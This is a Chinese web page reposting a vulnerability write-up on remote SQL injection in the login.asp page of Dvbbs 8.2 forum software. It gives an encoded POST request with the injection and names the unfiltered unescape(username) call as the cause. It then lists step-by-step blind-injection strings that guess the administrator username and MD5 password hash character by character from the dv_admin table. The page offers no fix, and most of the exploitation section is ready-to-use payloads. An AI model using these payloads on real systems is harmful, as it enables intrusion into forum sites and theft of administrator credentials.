Dvbbs8.2 access/sql版login.asp远程sql注入漏洞脚本安全 -电脑资料

电脑资料 时间:2019-01-01 我要投稿
【www.unjs.com - 电脑资料】

   

    漏洞分析:

    password=123123&codestr=71&CookieDate=2&userhidden=2&comeurl=index.asp&submit=%u7ACB%u5373%u767B%u5F55&ajaxPost=1&username=where%2527%2520and%25201%253D%2528select%2520count%2528*%2529%2520from%2520dv_admin%2520where%2520left%2528username%252C1%2529%253D%2527a%2527%2529%2520and%2520%25271%2527%253D%25271

    编辑说明下 刚有人问语句 具体就是

    If ajaxPro Then username = unescape(username)

    这个没有过滤

    漏洞利用:(access版)

    由于使用验证码,该漏洞只能纯手工进行注入尝试,在用户登陆页面,用户名处构造sql语句

    如:

    判断

    Where’ and ‘1’=’1

    where’ and ‘1’=’2

    密码任意6位,输入验证码

    根据返回信息,第一条显示用户名或密码错误第二条显示无此用户

    猜解用户

    where’ and 1=(select count(*) from dv_admin where left(username,1)=’a') and ‘1′=’1

    where’ and 1=(select count(*) from dv_admin where left(username,2)=’ad’) and ‘1′=’1

    ……………………….

    ……………………

    …………………….

    猜解密码(md5加密)

    where’ and 1=(select count(*) from dv_admin where left(password,1)=’1′) and ‘1′=’1

    where’ and 1=(select count(*) from dv_admin where left(password,2)=’15′) and ‘1′=’1

    ……………………

    ……………………

    …………………..

    简单测试官方sql版也存在漏洞,利用过程不写了

最新文章